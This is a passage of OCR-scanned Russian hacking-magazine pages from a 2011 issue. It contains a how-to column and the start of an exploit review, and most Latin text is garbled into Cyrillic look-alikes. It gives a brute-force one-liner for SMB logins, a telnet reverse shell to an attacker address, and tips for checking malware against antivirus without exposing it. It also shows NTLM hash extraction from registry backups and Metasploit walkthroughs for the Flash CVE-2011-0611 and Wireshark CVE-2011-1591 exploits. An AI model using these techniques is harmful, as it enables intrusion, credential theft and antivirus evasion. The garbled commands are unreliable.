запустившего его. Для просмотра всех процессов — просит уже более 
высоких привилегий. 

Решение без использования сторонних программтипа Ргосезз 
Ехріогег’а от Русиновича есть. Имя ему — ТазкИзТ Это стандартная 
консольная тулза. Она выводитвсезапущенные в винде процессы, чем 
мы и можем воспользоваться. 

Кроме этого, у программы есть еще пара юзабельных аргументов, кото- 
рые могут пригодиться. 



Отображение служб для процессов: 
1:а5к1І5І: /5ѴС 




Список процессов через консоль 



Отображение процессов с подгруженными сііі'ками: 
ѣазкІІБІ: /Р 




ЗАДАЧА: НАЙТИ ЛЕГКУЮ АЛЬТЕРНАТИВУ 
СНИФФЕРАМ НА БАЗЕ ѴѴІЫРСАР. 



РЕШЕНИЕ: 

Хочу познакомить тебя с недавней разработкой ЫЕТРЕ8ЕС — небольшой 
тулзой, позволяющей снифать трафик. Зовут ее РаѵѵСар [ ѵѵѵѵѵѵ.пе 

РаѵѵСа ). Обладая не слишком серьезной функциональ- 
ностью, она является отличным выбором для тех, кто потем или иным 
причинам не может использовать библиотеку ѴѴіпРСАР. Хоть возмож- 
ности ее и невелики — мониторингинтерфейса и дамп всего в файл, но 
следующие преимущества заставляют к ней присмотреться: 

1) Весит она всего 17 Кб; 

2) Работает через стандартные гам зоске1:5 ілііпсіоыб (о том как 
реализовать сниффер на базе этой технологии, читай в ста- 
тье «Скринсейвер-нюхач» - мы. хакер. ги/таеагіпе/ 
хА/077/112/1 . авр ) ; 

3) Отсутствие установки; 

4) Возможность прослушивания почти любых интерфейсов, включая 
ІлІіРі- , ІоорЬаск- и РРР-интерфейсы. 




Снифим трафик. Ваѵѵсар — мал да удал. 

нию разработчика —утилита не совсем корректно работает (пропу- 
скает пакеты) под ѴѴіпсІоѵѵз 7 (для входящих пакетов) и под Ѵізіа (для 
исходящих). Во-вторых, необходимо присутствие .ЫЕТ Егатеѵѵогк 
версии 2.0. В-третьих, потребность в админских правах. 
Запускается тулза следующим образом: 



Из минусов стоит отметить следующие вещи. Во-первых, по заявле- КамСар.ехе номер_интерфейса имя_файла_дампа 




ЗАДАЧА: СБОР ИНФОРМАЦИИ, А ТАКЖЕ 
ПЕРЕБОР СТАНДАРТНЫМИ СРЕДСТВАМИ 
ѴѴІЫООѴѴ5. 



РЕШЕНИЕ: 

В продолжение предыдущей задачи давай посмотрим, что еще мы 



можем сотворить в консоли. Конечно, виндовая консоль — это то, с чем 
приходится мириться, а нето, чем хочется пользоваться, потому что 
удобно. Впрочем, это лирика. Итак, ситуация примерно следующая. Мы 
имеем права обычного пользователя на какой-то тачке. Что мы с этим 
можем сделать? Особенно, если доступ есть только к консоли (т.е. шелл). 
Конечно, лучше всего было бы закачатьтого или иного софта и не му- 
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читься. Но, во-первых, могут бытьтрудности с закачкой файлов (когда 
поовнилась машина за фаерволом и прямого доступа нет), во-вторых, 
антивирусы могутзадететктить, если закачаешь какую-то ересь. Окей. 
Так что же нам может предложить виндовая консоль и стандартные 
инструменты? Думаешь ничего? Какбы нитак. По сути, классический 
набор для сбора информации о сети, а крометого — возможность про- 
ведения некоторых видов атак. 

Как раз об этом рассказывал Е б Бкоисііз в вебкасте «РепеІгабопТезбпд 
КІіп^зи». Запись и слайды можно скачать здесь [ ѵѵѵѵѵѵ.согезесигііѵ.сопп/ 
сопІепі/ѵѵеЬсазІ-зегіез-ѵѵіІб-запз І, 

Я же приведу несколько примеров оттуда: 

С:\> Тог /I %і іп (1,1,255) сіо @ріп§ 10. 10.10. %і -п 1 
| бпсі "Керіу" 

Здесь Топ — команда начала цикла; 

/І_ —указывает, что цикл — счетчик; 

%і — имя переменной цикла; 

іп (1,1,255) — значения от 1 до 255 с шагом 1; 

сіо @ріп§ — окончание цикла выполнением команды ріпд ; 

10. 10. 10. %і — ІР-адрес с подставленной переменной; 

-п 1 — количество ПИНГОВ; 

| бпсі "Керіу" — результата работы передаутся«|» на вход команде 
ТіпсІ, которая ищетслово«РерІау». 

Каквидишь — все просто. Таким образом, мы находим живые хосты в 
диапазоне 10.10.10.1-255. 

Логику следующих примеров пояснять не буду, уверен, ты разберешься. 
Добавлю еще только пару пояснений: 

СоттапсІІ & СоттапсІ2 — запуск нескольких команд; 

СоттапсІІ && СоттапсІ2 — запуск второй, только приуспешном выпол- 
нении первой; 

> — записьвфайл; 

>> — записьв конецфайла; 

Рог /Р — цикл пофайлу; 

СоттапсІ 2 > пиі — стандартный выводошибок не отображается; 
СоттапсІ 2 >> епгопз .ТхТ — ошибки в файле. 

Итак, определяем имена хостов: 

С:\> Тог /І_ %і іп (1,1,255) сіо (Эпвіоокир 10. 10. 10. %і 2>пи1 




Сканирование, используя стандартный Ар-клиент 



| ТпсІ "Мате" && есбо 10. 10. 10. %і 

Портсканнер на базеТСр-клиента: 

С:\> Тог /І_ %і іп (1,1,1024) сіо есбо Сбескіп§ РогТ %і: >> рогТз. 
ТхТ & есбо ореп 192.168.0.1 %і > ТТр.ТхТ & есбо диіТ >> ТТр.ТхТ & 
ТТр -5 гТТр.ТхТ 2>>рогТ5.1:хТ 

Перебираем логины и пароли из файла на доступ кудаленному хосту по 
ЗМВ: 

С:\> Тог /Т %і іп (изег.ТхТ) сіо @(Тог /Т %д іп (разз.ТхТ) сіо @ 
есбо %і : %д & (ЭпеТ иве \\10. 10. 10. 10 %д /и:%і 2>пи1 && есбо %і : %д 
>> виссевБ.ТхТ && пеТ иве \\10. 10. 10. 10 /сіеі) 

Каквидишь, весь набор: пинг, днс-резолв, портскан, брутфорс. И все 
вполне юзабельное. А что самое приятное — доступно «бесправным» 
юзерам. Крометого, сбор баннеров и брутфорс других протоколов можно 
организоватьаналогичным образом посредством Іеіпеба. Жаль только, 
что его убрали из винды, начиная с Ѵізіа. 

Отом, что возможностей в піх’ах гораздо больше, можно и не говорить. 
Ты только посмотри, как можно элегантно сделать реверсивный шелл 
через телнет: 

ТеІпеТ [аТ1:аскег_ІРасІсІг] [рогТІ] | /Ьіп/ЬавТі | ТеІпеТ 
[аТТаскег_ІРасІсІг] [рогТ2] 

Однако и в винде можножить. 

Остальные интересные примеры ищи в веб-касте. 




ЗАДАЧА: ПРОВЕРИТЬ АААЛВАРЬ НА 
ДЕТЕКТИРУЕМОСТЬ БЕЗ СЕРВИСОВ 
ВРОДЕ ѴІВІІЗТОТАІ.. 



РЕШЕНИЕ: 

В мартовском номере я уже писал про эту задачу. Нам требовалось 
проверить малварь на обнаружаемость антивирусами, но не хотелось 
бы, чтобы дикие экземпляры попадали в антивирусные компании. В ка- 
честве замены были предложены альтернативные онлайн-сканеры. Но 
только на платных обещалось, что экземплярчики никуда неуплывут. 

То есть по факту — половина решения. 

Таквот, альтернативное решение. Недавно мне пришло письмо от 
человека с ником Нітікаі, в котором он скинул ссылку на проект 
«сарзі 2-МиШ5саппег». Прочитать краткое описание и скачать можно 
на античате — Ьгит.апбсбаЕпеіДбгеасІ2661 46.Ы:т[ . Сайт проекта с 
последней версией ПО - сарзі 2-зесип1у.Ыод5роТсот . 

Идея не нова, и в теории про это даже кто-то когда-то писал в журнал. 
Суть ее — развернуть все антивирусы у себя и у себя же проверять 
малварь. Таким образом, успешныеэкземпляры гарантированно не 
попадутв антивирусные компании. 

Основная проблема — скуч ковать все анти в и ри на одной машине без 
виртуальных машин. Что и было решено. В итоге получилась вполне 
годная утилита. Она позволяет поселить в одну систему целых 13 анти- 
вирусов, и они даже не поругаются. В основном — это самые распро- 



страненные аверы, однако тотже каспер в списке поддерживаемых 
отсутствует. Будем надеяться, что в следующих версиях он появится 
— проект, похоже, в стадии активного развития. 

В процессе использования никаких сложностей не возникает. Основ- 
ной алгоритм действий при первом запуске следующий: 

1) 3апускаем тулзу; 

2) Выбираем интересующие нас антивирусы; 

3) Программа их ска- 
чивает; 

4) 0бновляет их. 

Далее мы можем выби- 
рать интересующую нас 
малварь и проверять 
ее. 



Проверка библио- 
теки, созданной в 
М5Р двумя анти- 
вирями 



‘ / М -Ѵ*пп#г -^і а я*: ■ ьу Я 
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ЗАДАЧА: ПОДОБРАТЬ ИМЯ 
ПОЛЬЗОВАТЕЛЯ СУБД ОВАСІ.Е. 



РЕШЕНИЕ: 

Продолжаютему по взлому базы данных Огасіе и потерзанию одного 
из основных ее сетевых сервисов — ТЫБ Іізіепег’а. 

Сегодня мы поговорим об авторизации в данной СУБД. Особенность 
ее заключается в том, что клиент при подключении сначала отправ- 
ляет имя пользователя, серверже проверяетего существование в 
базе, и еслитакового нет — отвечает«Іодіп сіепіеб», иначе — продол- 
жается процесс авторизации. Таким образом, основываясь на ответе, 
мы можем перебирать имена пользователей. 

Как видно, это — классическая уязвимость. Но оно и понятно — СУБД 
проектировали давно, о безопасности тогда, видимо, не особенно 
думали. 



Реализует подобный перебор (по словарику) тулза 
ога-изегепит. Она входит в ОАК (Огасіе Аззеззтепі КМ;) , который 
написал БаѵісІ БТсЬТеШ ( ѵѵѵѵѵѵ.сІаІаЬазеБесигіІѵ.сопп/сІЬзес/ОАК. 
гір ). Исходники прилагаются, та к что утилиту можно подправить по 
собственным нуждам. 

Пример использования: 

ога-изегепит. ехе 192.168.0.1 1521 ОКСИ изегіізі: .іхі 

Где 192.168.0.1 1521 — адрес и порт Огасіе; 

ОКСИ — ЗЮ базы данных; 

изегіізі: .ТхТ — имена пользователей для перебора (стандартный 
словарь входит в ОАК). 

Перебрав имена пользователей БД, можно будет перейти следую- 
щему шагу — подбору паролей, о котором мы еще поговорим. 



р:\ххх\ОПК>оі'а"изсгспит.схс _ _ изсгІізЪ - Схі; 

|8ѴЗ гіоез поС ехійС 
|8Ѵ8ТЕМ гіоез поі ехіві 
.01* ЬМ ехізкв 
О В 6 т І: к 

МКККЕЙБВНБ1ІР гіоез по* ехіві: 

|8С0ТТ ііоез поі ехізк 
МЙККЕЯиМКУЗ сГоех поЬ ехіві; 

|СТХ8У5 Доев поС ехізг: 

МАККЕКМ05Ѵ8 Доев ноі ехіеѣ 



Перебираем имена пользователей 




ЗАДАЧА: НАЙТИ ЛЕГКОВЕСНУЮ И 
ПРОСТУЮ АЛЬТЕРНАТИВУ МЕТА5РЮІТ 
РРАМЕѴУЮРК. 



РЕШЕНИЕ: 

В последнее время МБР все чаще привлекаетксебе внимание. Он все 
растет и растет. Выходят новые версии. Он облепляется новыми моду- 
лями, новыми возможностями. И, что ни говори, инструмент отлич- 
ный. Многие изтех, кто раньше просто присматривались, сейчасуже 
вплотную перебрались на МБР или его платные варианты. Нос ростом 
он явно потерял в оперативности, да и не все модули не под всеми 
ОС работают, кое-что надо доустанавливать. Хотя вторая трудность 
решается использованием подготовленных дистрибутивов вроде 
ВаскТгаск. Кстати, уже вышла пятая версия ВТ, чему мы все можем 
только порадоваться. Но возвращаясь к нашей задаче, могу сказать, 
что если надо сделать что-то оперативно, то на МБР даже не смотри. 
Ытарсего ЫБЕ (ІЧтар Бсгірііпд Епдіпе) движком — вот реальное 
решение. Особенно, сучетомтого, что скрипты для движка вовсю раз- 
множаются. Полный их списоктут : птар.огд/пБесІос . 

Теперь кпримерам.Брутфорсим комьюнити-стринги кзптр-сервису: 



птар --зсгірі: огасІе-Ьгиіе -р 1521 - -зсгірі-аг^з огасіе- 
Ьгиіе. бісі=ОКСІ_ <і:аг§еі:> 

Передача БЫР-зоны: 

птар -р53 -зсгірі сіпз-гопе-ігапзіег -зсгірі-аг^з 
сІп52опе1;гап5-Рег.сІотаіп=ехатр1е. сот <іаг§е1:> 

Проверка хостов на основныеуязвимости в БМВ-протоколе. Самое 
интересное — М508-067: 

птар -р445 -зсгірі=5тЬ-сІіеск-ѵи1п5 <іаг§е1:> 

Находим в сети хосты с МББОБ-сервером и получаем инфу (версия, 
порт) О НИХ: 

птар --зсгірі: Ьгоасісазі-тз-зді-сіізсоѵег 

Всего скриптов порядка 200. Крометого, есть целая куча библиотек, 
позволяющая самостоятельно разрабатывать новые скрипты. 



птар -зіі -рібі --5сгірі=5птр-Ьги1:е --зсгірі - 
аг§з=5птр1І5і=соттипіііез .іхі <іаг§еі> 

Здесь, -зіі — сканирование исі р ; 

-рібі — портзптр сервиса; 

- -5сгірі=зптр-Ьгиіе —указываем, какой скрипт за- 
пускать; 

- -зсгірі-аг§5=5птр1І5і=соттипіііез .іхі — пере- 
даем аргумент— список стрингов. 

Файл для перебора лучше взять из внутренностей МБР. 
Кстати, в МБЕданный модульхреново работает под ѴѴіп7. 
Брутфорс стандартных учеток к Огасіе (аналогичный 
модуль МБР не работает под ѴѴіп): 



Ищем в подсетке пользователей сІгорЬох'а 



ІТГ з - 1 1 1 : г гг. Ч.я я ѴііГіЛ{і :1І 'і гтірі: -’ЬгпіНг г і^гл|іНлѵ I іэе^лнг 

■ Т 4 ГГІ№і е. НчГр:^УМі*|>.*ІР^ > ЙТС ІС 1 Ь 03 I? ІВ : М 1 }м < Н | Г*Ш 1 ч 

І С«Л I С-гѴрІ ІЧМ-МІ**! 

- ІІЗ-ѴЛ'Лі. Л 1 I - ІІпрІНІ ■ - I іа I. гм гг" 

I й і іыі л ипллл ■ II тикгі илн Ьпк Кл с, і _ Ь п Ь пил іі>л.га ■ 

! ДМ . 1 ^ М ГЛЙй ■ ■ Ш I II ■ Ж» 

ЪлірнЯМП: Н» С Л і-, Л ш е % ««г .|»-е 1 .І 1*4* 5 Л Г» Ь«'-ч * ллгмИ . 

Иг.А а , Н-э-г.я I II Ш АІІ.ІКѴРѴ 1 Г Кдьіе і^У - 1 ісрплрі ял рі-сдіг.Нх 

■: - -,и зпгяЧіі 2 -ппар -аѴ —«ісг Ьрі ■ Іігм аііг. на к -ііги рЬн-п - I к я 1 г пг г 

Ет іігТ I Ад С 1 лі 20І I К-ІЧ зНіН І^гѵі г с нн кГ-ь <мяС*> 

Г I*.- ■. 1 -кѵГ і-*кч 1 ІЕ* = 

|: Нг 7 ліДр*.|Л - ѣ- \ ір і ірп-рг : 

|! 4 ів.р 1 и }плпг іц рнгі, ѵп п іоп Іші ІпЪ иирша рае н а 

ІЛПШЗ № і Ил ейгцгіс: ыгп цігі іі ІгЛ. : м ІР Ни я ■ ~ яглпппгі. 

■ - а ■ И'>тіі = ГГ '■і'іт+иіі іч-іті '«у-і ісікп^М ■? пн і рст>п-1-і 



► 042 



ХАКЕР 07 /1 50/ 201 1 








ЗАДАЧА: ВЫНУТЬ УЧЕТНЫЕ ЗАПИСИ ИЗ 
РЕЕСТРА ѴѴІЫР0ѴѴ5. 



РЕШЕНИЕ: 



ния бекапа системы — пібаскир.ехе. Запустить ее можно и в ГУИ, и в 
консольном варианте. Особенность ее состоит в том, что она может 
использовать фичу винды — Ѵоіиппе ЭбасІоѵѵСору (Ѵ55). Это позволяет 
ей бекапить залоченные файлы. По сути, все что нам потребуется, так 
это выполнить следующую команду: 



Какни странно, при взломе чаще всего достается именно виндовым 
машинкам. Захватив даже одну из них, можно поовнитьвсю сеть. Но об 
этом мыуже писали. Сегодня мы решаем практическую задачу — нужно 
вынуть ЫТІ_М-хэши из операционки. Можно было воспользоваться 
тулзамитипа дзессіитр, [дбитр. Нотутимеются подводные камни. 
Во-первых, будут о рать анти в и русы и проактивные защиты (из-за вне- 
дрения в процесс). Но это обходится. Во-вторых, есть проблемы с лока- 
лизованными и 64-разрядными ОС, что уже существенно. Какрешение 
можно использовать то, что І\ІТІ_М-хэши и кэши хэшей (М5 Сасбе) 
хранятся в реестре ѴѴіпсІоѵѵз. Если мы каким-то образом извлечем 
файлы реестра, то уже локально у себя на компе мы сможем вытащить 
необходимую нам инфу. Для вытаскивания мы можем воспользоваться 
либо знаменитым Саіп&АЬеІем ( ѵѵѵѵѵѵ.охісі.іі/саіп.біппі ), либо руібоп- 
скриптом ( сосіе.доодіе.сопп/р/сгесісіиппр і. Если захочешь использовать 
сгесШитр под ѴѴіпсІоѵѵз, то придется установить библиотеку русгуріо 
[ ѵѵѵѵѵѵ.аппк.са/рѵібоп/сосіе/сгѵріо ]. Все просто, но нужные нам файлы 
реестра, так называемые ветви (біѵез), нельзя так просто прочитать 
или скопировать даже с самыми высокими привилегиями. 

Имена файлов ветвей реестра в С:\ѴѴШ00ѴѴ5\5у5Іет32\соггіід 

НКЕУ^ІЖКЕІ\ІТ_СОІ\ІРіе - Бузует 
НКЕУ_СІЖКЕІ\ІТ_и5ЕК - ІМІіизег .сіаі: 

НКЕУ_ШСАІ__МАСН:іЖ\5АМ - 5ат 
НКЕУ_ШСАММАСН:ШЕ\5есигі1:у - 5есигі1:у 
НКЕУ_ЮСА1_МАСН1МЕ\5о-Р1:ыаге - Бо-р-Ыаге 
НКЕУ_ШСАІ__МАСН:ШЕ\5у5І:ет - Бузует 
НКЕУ_ІІ5ЕК5\ . йЕРАШТ - Ре-РаиН: 

Что же делать? Если есть физический доступ к компьютеру и воз- 
можность запустится с ІіѵеСО.то проблем нет — копируй. Иногда 
можно найти сохраненные копии этих файлов. Если же нет, то можно 
воспользоваться одним хитрым методом — стандартной системой 
бекапа. Все что нам потребуется — админские права на компе. Но 
есть и ограничения — метода работает на винде до висты и 2008 
включая. 

В этих «старых» операционках есть встроенная утилита для созда- 



ІМІіЬаскир.ехе Ьаскир зуз1:ет5І:а1:е /д "Віаіі-Ыаб-Ыаіі" /і 
"с:\Ьаскир.Ьк-Р" 

Где Ьаскир — указываем, что создаем бекап; 

Буз’Ьетз'Ьа'Ье — бекапить критичные области 
ОС; 

/д "ВІаЬ-ЫаЬ-ЫаЬ" — названиезадачи 
— любое; 

/-Р "с:\Ьаскир.Ьк-р" — куда сохраняем наш 
файл бекапа. 

И дальше придется подождать. Причем по- 
дождать п а ру тро й ку м и нут, та к ка к бе ка п ится 
будут все критичные области, а их в винде 
полно. ПодХРу меня получался бекап разме- 
ром в 500 метров. Немаленький, но по локалке 
скачать или на флешку за кинуть (если ты злобный инсайдер) — неболь- 
шая проблема. Данный бекап можно разархивировать этой же тулзой 
(ноужеусебя на компе) и заняться выковыриванием хэшей. 

Кстати, здесь есть еще одна хитрость — когда мы бекапим критич- 
ные области, то ветки реестра (заодно так) копируются виндой в 
%зузІеппгоо1:%\гераіг. Получается как бы создание некой точки вос- 
становления. Этим-то мы и можем воспользоваться — все необхо- 
димые файлы реестра, их последние версии лежаттам. Получается, 
что скачивать, в принципе, нам потребуется всего порядка 1 0 мега- 
байт, а значит, данный метод можно использовать и при удаленных 
атаках. Метод отличный, однако (неизвестно почему) работает он 
не всегда, так что с полным бека пом надежнее. Теперь об ограни- 
чениях по ОС — начиная с Ѵізіа и 2008 М іеговой лишил нас утилиты 
пібаскир. Типа, там появилась встроенная система бекапа. Но и тут 
не все так плохо. Если мы скачаем файлы пібаскир.ехе, пітзарі.сіи, 
ѵззарі.сИІ из %5у5Іеі7ігооІ%\зу5І:епп32 с машинки с ХР и закачаем их 
на Висту, причем в любую папку, то тулза опять заработет, но возмож- 
но в урезанном режиме — без бекапа критичных областей. Что же 
делать? Как минимум, мы можем разбекапить краденые файлы. 
Теперь немного непроверенной информации — для ОС Ѵізіа и 2008 (не 
Р2) можно включить: «ЫТВаскир сап Ье изесі 
ипсіег ѴѴіпсІоѵѵз Ѵізіа апсі ѴѴіпсІоѵѵз 5егѵег2008 
Ьу епаЫіпд Пае РетоѵаЫеЭіогаде Мападег 
сотропепі іпТигп ѴѴіпсІоѵѵз Іюаіигезоп ого^ 
сопігоі рапеі». Доступа кэтим ОС у меня нет, 
проверить не смог. Говорят, что и в ѴѴіп 7 и 2008 
Р2 — тоже (с некими извратами) это возможно. 
Самое хорошее в этом методе — отсутствие 
проблем сантивирями и прочими защитны- 
ми системами, таккакмы остаемся в рамках 
стандартных возможностей. Ну а дальше, 
самое простое и приятное — получение хэшей 
и паролей. 

Хэши учеток: 

рмсіитр.ру 5У5ТЕМ БАМ 
Пароли к сервисам 
(иногда в открытом виде): 

Ізасіитр. ру 5У5ТЕМ 5ЕСІШТѴ 
Кэши хэшей: 

сасбесіитр. ру 5У5ТЕМ 5ЕСІЖІТУ 

Как видишь, все просто. □□ 
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Все описанные про- 
граммы со всей ру- 
брики ищи на диске. 
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Приветствуем тебя, о достопочтимый читатель! В обзоре эксплои- 
тов данном собрали мы для тебя не рецепты яств заморских, не 
изображения дев нагих, а набор эксплоитов интересных за месяц 
последний. Так узри же очами своими письмена следующие, и да 
пребудет с тобой Сила! 




УЯЗВИМОСТЬ в АйОВЕ РЬАЗН 
РІАѴЕК 10.2.153.1 БѴУ/Р 



:Ѵ55Ѵ2 



9.3 (АѴ : ІЧ/АС :М/Аи : Ы/С :С/І :С/А:С] 



гшз 

Дата релиза: 1 1 апреля 201 1 
Автор: зіппЗг 
СѴЕісі: СѴЕ-201 1-061 1 

РІазЬ Ріауег представляет собой виртуальную машину, на которой 
выполняется загруженный из интернета код ПазЬ-программ. 
Важный недостаток ДазЬ-приложений заключается в недостаточ- 
ном контроле ошибок, что приводит к частым отказам как самих 
приложений, так, в некоторых случаях, и всего браузера. 
Возможность флешовых приложений нарушать работу всего брау- 
зера неоднократно вызывала критику со стороны разработчиков 
браузеров. 

В этот раз мы рассмотрим сбой в АбоЬе РІазЬ Ріауег, который 
происходит из-за неправильного использования типа объекта, 
что позволяет атакующему перезаписать указатель в памяти и в 
результате добиться исполнения произвольного кода, иначе го- 
воря, перехватить контроль над системой, подверженной данной 
уязвимости. На данный момент эта уязвимость активно исполь- 
зуется для распространения разнообразной малвари: эксплоиты 
для бага вошли в используемые злоумышленниками сплойтпаки. 
Векторы вторжения: АбоЬе РІазЬ Ріауег, АбоЬе Реабег и АсгоЬаІ, 
Місгозоіі ѴѴогб/ЕхсеІ (включение .ѵѵі-файлов в бос- и хіз-файлы 
соответственно). Справедливости ради нужно отметить, что АбоЬе 
РеабегХ в защищенном режиме работы используетзапбЬох и пре- 
секает исполнение произвольного кода, несмотря на существова- 
ние уязвимости. Впрочем, это обстоятельство мало что меняет :). 



ЕХРЮІТ 



Уязвимый вызов располагается по адресу 0x1 00601 16 в библиотеке 
РІазЫ Оо.осх (для версии плагина АбоЬе РІазЬ Ріауег 1 0.2.1 53.1 ). 
Код АсІіопЗсгірІ, позволяющий достигнуть уязвимого места: 

Оа1:е.рго1:о1:уре.с_-Рип = БЬагебОЬдесІ: . рго'Ьо'Ьуре . §е1:5І2е; 
йа1:е. рго1:о1:уре.§е1:Оау = : ипс1:іоп () 

{ 

ІіМіз . с_-Рип ( ) ; 

}; 

ѵаг еѵа1(0) = пеы Оа1:е(1 .41466385537348е-315) ; 

(еѵа1(0) ) . §е1:Оау( ) ; 

Дальнейший анализуязвимости, вызванной вышеприведенным 
кодом, показывает, что мы имеем очередную неразбериху стипом 
объекта, произошедшую в ЗЬагебО^'есІ.ргоІоІуре.деіЗігеО, когда 
класс Раіе расширяется добавлением пользовательской функции, 
полученной через ЗЬагебО^есРргоІоіуре.деіЗіге. Объект йаіе ини- 
циализируется значением 1 .41 466385537348е-3 1 5, которое при со- 
хранении в памяти преобразуется в 0х 11111110, аон, в свою очередь, 
подходит для реализации техники Ьеар зргауіпд. Когда вызывается 
пользовательская функция Оаіе.сДДпО, управление передается в 
ЗЬагебО^есІ.ргоІоІуре.деіЗігеО, в которой происходит некоррект- 
ная интерпретация передаваемого объекта Раіе как имеющего тип 
ЗЬагебО^есІ, в результате чего совершается попытка использовать 
значение, которым был инициализирован объект Раіе (0x11111110), 
какуказатель на таблицу виртуальных функций. Используя модуль из 
теіазріоіі, запустим на подверженной уязвимости машине кальку- 
лятор: 

ГП5-Р > іі5е ехр1оі1:/ыіпбоы5/Ьгоы5ег/абоЬе_-Г1а5Іір1ауег_ 
ЛавЫѲо 



► 044 
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№ Ихід Пѵі Мй 0№п №№ Мгір Ш 

« К » II »| 4 І >1 II I I ш с 



РіиквЛ 



ЕХРЮІТЗ 

РЕѴІ Еу 1 

ЕХРЮІТЗ 
РЕѴІЕѴѴ 







ЕХРЮІТЗ 
КЕѴІЕуі ^ 




1 ЕХРЮІТЗ 


1 



ЕХРЮІТЗ 

РГѴІГШ— 



ЕХРЮІТЗ 

КЕѴІЕѴѴ 



Ошибка в библиотеке РІазМОо.осх 



Ш5"Р ехр1оіі(...) > 5еі РАУЮАй ыіпсіоыз/ехес 

РАУ ЮАР => ыіпсІоы5/ехес 

Ш5"Р ехр1оі1:(...) > 5еі СМй саіс.ехе 

СМй => саіс.ехе 

Ш5"Р ехр1оіі(...) > ехріоіі 

[*] Ехріоіі: гиппіп§ аз Ьаск§гоипсІ ]‘оЬ . 

гпБ-Р ехр1оіі(асІоЬе_Па5Іір1ауег_Па5Іі10о) > 

[*] 1І5Іп§ ІІКІ_: біір : //0 . 0 . 0. 0 : 8080/1 к32ОуСР10І\ІІЖ6В 
[*] І_оса1 ІР: біір : / / 192 . 168 .2.20: 8080/1 к32ОуСР10І\ІІІК6В 
[*] Бепѵег зіагіесі . 

Сервер запущен. Теперь от нас требуется только пройти по предо- 
ставленной ссылке (Ьир://192.168.2.20:8080Лк32ОуСРТ0ЫиР6В) 
и мы сможем смиренно, затаив дыхание наблюдать за тем, как 
I піе гпеі Ехріогег превращается в калькулятор... 



ТАВСЕТ5 



ІЕ 6/7 на ѴѴіпбоѵѵз ХР 5РЗ и ѴѴіпсІоѵѵз Ѵізіа . 



50ШТІ0Ы 



Обновить АбоЬе РІазЬ Ріауег. 



ПЕРЕПОЛНЕНИЕ БУФЕРА НА 
СТЕКЕ В 5НАКК <= 1.4.4 
РАСКЕТ-РЕСТ.С 




ЕШШЗ 

Дата релиза: 18 апреля 201 1 

Авторы: Раиі Макоѵѵзкі — провел первоначальное исследование, 
зіскпезз — реализовал РОС, согеІапсОсІЗг — создал эксплоит, ис- 
пользующий РОР + модуль для ппеіазріоіі;. 

СѴЕ ісі: СѴЕ-201 1-1591 

ѴѴігезбагк (ранее ЕіЬегеаІ) — это один из лучших анализаторов 
сетевого трафика, доступных на сегодняшний момент. Имеет гра- 
фический пользовательский интерфейс. 

Функциональность, которую предоставляет ѴѴігезбагк, очень 
схожа с возможностями программы Ісрбитр, однако ѴѴігезбагк 
имеет графический пользовательский интерфейс и гораздо так 
же больше возможностей по сортировке и фильтрации информа- 
ции. 

Программа позволяет пользователю просматривать весь про- 
ходящий по сети трафик в режиме реального времени, переводя 
сетевую карту в неразборчивый режим (рготізсиоиз тобе). 
ѴѴігезбагк «знает» структуру самых различных сетевых протоколов 
и поэтому позволяет разобрать сетевой пакет, отображая значение 
каждого поля протокола любого уровня. 

Поскольку для захвата пакетов используется рсар, существует воз- 
можность захвата данныхтолько изтех сетей, которые поддержи- 
ваются этой библиотекой. Тем не менее, ѴѴігезбагк умеет работать 
с множеством форматов входных данных, соответственно, можно 
открывать файлы данных, захваченных другими программами, что 
расширяет возможности захвата. 



СѴ55Ѵ2 



9.3(АѴ:М/АС:М/Аи:[\І/С:С/І:С/А:С) 



ЕХРЮІТ 



Уязвимое место в коде (исходный код ѵѵігезбагк 1.4.1, раскеі- 
бесТс, строка 1 886): 
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/* РІ11 В-Ріеісі */ 

(ркі_1еп>0ЕСТ^АСКЕТ_ІІ\ІР0_І_ЕІ\І+2) 

тетсру( (сбаг*) (&(ркі_ЬРіе1сІ .йаіа) ) , (сііаг*) (ркі_р1:г+8) , 
ркі_1еп-5-8) ; // < — уязвимое место 

еізе 

тетзеіД (сбаг*) (&(ркі_ЬРіе1сІ .Оаіа) ) , 0, 128); 
рк1:_Ь^е1сІ.Іеп§-иі=рк1:_1еп-0ЕСТ_РАСКЕТ_ІМР0_ІЕМ-8; 



ркІ_ЬРіеІсІ представляет собой структуру типа бес1:_ЬРіеІсІ, описа- 
ние которой приведем ниже: 

зігисі: сІес1:_ЬРіе1сІ 

{ 

§иіп1:8 йа1:а[128]; 

§иіп1:8 І_еп§1:Іі; 

}; 

Как видно, происходит копирование данных пакета в 1 28- байтный 
буфер Оаіа, располагающийся на стеке. Для того чтобы лицезреть 
уязвимость воочию, нам надо будет сформировать определенным 
образом рсар-файл и отправить его на нужный интерфейс. На- 
пример, этого можно добиться, используя прекрасную вещь под 
названием зсару: 

#! /изг/Ьіп/епѵ руібоп 

ітрогі: зуз 

-Ргот зсару ітрогі: * 

мгрсар( "іезі . рсар", Еібег(1:уре=0х2323)/( "А"*1000) ) 
Запускаем ѵѵігезбагк, заставляем его слушать нужный нам ин- 

► 046 



терфей с и шлем ему привет в виде только что сформированного 
пакета: 

# ісргеріау -і аіб0 -і іезі.рсар 

Ровно один пакет — и ѵѵігезбагк с грохотом падает ниц. Ну а 
теперь, воспользуемся благами цивилизации в виде модуля для 
теіазріоіі и сформируем эксплоите классической, полезной на- 
грузкой в виде запуска калькулятора: 

ГП5-Р ехр1оіі(іл/ігезІіагк_раске1:_сІес1:) > изе ехріоіі/міпсіоіл/з/ 
Рі1еіогта1:/ѵ\/іге5Ііагк_раске1:_сІес1: 

тз-р ехр1оіі(іл/ігезІіагк_раске1:_сІес1:) > зеі: РАУЮАй ыіпсіоыз/ехес 
РАУЮАй => ыіпсіоыз/ехес 

тз-р ехр1оіі(іл/ігезІіагк_раске1:_сІес1:) > зеі: СМй саіс.ехе 
СМй => саіс . ехе 

тз-Р ехр1оіі(іл/ігезІіагк_раске1:_сІес1:) > ехріоіі 
[*] Сгеаііп§ ' раззмогсіз . рсар 1 Рііе ... 

[*] Ргерагіп§ рауіоасі 

[*] Ілігіііп^ рауіоасі іо Рііе, 1554 Ьуіез 

[*] СепегаіесІ оиіриі Рііе /орі/-Ргатеілюгк-3.6.0/тз-РЗ/сІа1:а/ 
ехріоііз/раззмогсіз . рсар 

Запускаем ѵѵігезбагк, ставим прослушку интерфейса. Отправляем 
вредоносный пакет: 

# іергеріау -і аіб0 -і /орі/-Ргатеілюгк-3.6.0/тз-РЗ/сІа1:а/ 
ехріоііз/раззмогсіз . рсар 

Наблюдаем калькулятор :) 



ТАВСЕТ5 



